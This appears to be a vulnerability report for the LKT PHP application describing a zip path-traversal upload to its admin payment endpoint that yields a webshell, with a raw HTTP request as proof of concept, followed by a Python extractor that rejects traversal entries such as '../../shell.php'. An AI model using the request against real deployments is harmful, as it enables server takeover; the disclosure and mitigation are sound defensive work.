Compressed file upload getshell #8

Open
@sviivyao

Cause of the vulnerability: when decompressing, the entries of the uploaded archive are not filtered or validated, which makes it possible to upload a zip containing cross-directory (path traversal) entries and get a shell.

Reproduction: log in to the backend and visit /open/app/LKT/index.php?module=system&action=pay to upload a compressed file. Put the malicious file with a traversal path into a zip, upload it, and let it be decompressed.

Then access the path of the malicious file:
PoC:

POST /open/app/LKT/index.php?module=system&action=pay HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22809827021874544672920013866
Content-Length: 959
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/open/app/LKT/index.php?module=system&action=pay
Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=0kbneeltri2qm0ropn901mvb61
Upgrade-Insecure-Requests: 1

-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_id"

0
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_key"

111
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="upload_cert"; filename="debug.zip"
Content-Type: application/x-zip-compressed

//upload file
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_cert"

http://127.0.0.1/open/app/LKT/webapp/lib/cert
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="Submit"


-----------------------------22809827021874544672920013866--

The upload succeeded and the file executed successfully!
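The flaw reported above is the classic "Zip Slip" pattern: an archive entry named `../../shell.php` is written relative to the extraction directory, so the file lands under the web root instead of the intended certificate folder. The following is an added example, not code from the LKT project or from the reporter, showing how an extractor should vet entries before writing anything. It is written in Python rather than the project's PHP so that it runs stand-alone; the destination directory `cert`, the allowed-extension list and the size limit are assumptions chosen to match a certificate-upload endpoint, and the sample archive is constructed inline.

```python
import io
import os
import stat
import tempfile
import zipfile
from pathlib import Path, PurePosixPath

# Hypothetical policy for a certificate-upload endpoint (assumption, not the
# project's real rules): only these extensions are ever written out of an
# uploaded archive, and no single entry may exceed this size.
ALLOWED_SUFFIXES = (".pem", ".crt", ".key")
MAX_ENTRY_BYTES = 1 << 20


def build_sample_zip() -> bytes:
    """Constructed sample archive: a benign entry, a wrong-type entry and a
    traversal entry. zipfile stores the traversal name verbatim, exactly as a
    hand-built PoC archive would carry it on the wire."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("cert/merchant.pem", "-----BEGIN CERTIFICATE-----\n")
        zf.writestr("cert/notes.txt", "not a certificate\n")
        zf.writestr("../../shell.php", "<?php echo 'pwned'; ?>")
    return buf.getvalue()


def _parts(name: str):
    # Treat backslashes as separators too: some archivers emit them and a
    # POSIX extractor would otherwise see "..\\x" as a single component.
    return PurePosixPath(name.replace("\\", "/")).parts


def classify_entries(zip_bytes: bytes, dest_dir: str):
    """Decide, before touching the filesystem, which entries may be extracted.
    Returns (accepted_names, rejected) with rejected as (name, reason) pairs."""
    dest = Path(dest_dir).resolve()
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # A symlink entry could redirect a later write outside dest.
            if stat.S_ISLNK(info.external_attr >> 16):
                rejected.append((name, "symlink entry"))
                continue
            # Reject absolute, drive-letter and ".." names syntactically, so
            # the verdict does not depend on what currently exists on disk.
            parts = _parts(name)
            if name.startswith(("/", "\\")) or ".." in parts or ":" in name:
                rejected.append((name, "path traversal"))
                continue
            # Belt and braces: the resolved target must still be inside dest.
            target = dest.joinpath(*parts).resolve()
            if target != dest and dest not in target.parents:
                rejected.append((name, "escapes destination"))
                continue
            if info.file_size > MAX_ENTRY_BYTES:
                rejected.append((name, "entry too large"))
                continue
            if not info.is_dir() and target.suffix.lower() not in ALLOWED_SUFFIXES:
                rejected.append((name, "disallowed extension"))
                continue
            accepted.append(name)
    return accepted, rejected


def safe_extract(zip_bytes: bytes, dest_dir: str):
    """Extract only the entries classify_entries() accepted."""
    accepted, rejected = classify_entries(zip_bytes, dest_dir)
    dest = Path(dest_dir).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in accepted:
            target = dest.joinpath(*_parts(name))
            if name.endswith("/"):
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(name) as src, open(target, "wb") as dst:
                dst.write(src.read())
    return accepted, rejected


def demo():
    """Run the hardened extractor on the constructed archive in a temp dir
    and report what was accepted, what was rejected and what hit the disk."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "cert")
        os.makedirs(dest)
        accepted, rejected = safe_extract(build_sample_zip(), dest)
        written = sorted(p.relative_to(tmp).as_posix()
                         for p in Path(tmp).rglob("*") if p.is_file())
    return {"accepted": accepted, "rejected": rejected, "written": written}


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows only `cert/cert/merchant.pem` being written; `../../shell.php` is refused as path traversal before any filesystem call, and the `.txt` entry is refused by the allow-list. The same three checks (no absolute or `..` components, resolved path stays under the destination, extension allow-list) are what a PHP handler should apply to each name returned by `ZipArchive::getNameIndex()` before calling `extractTo()`, rather than trusting the archive's own entry names.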
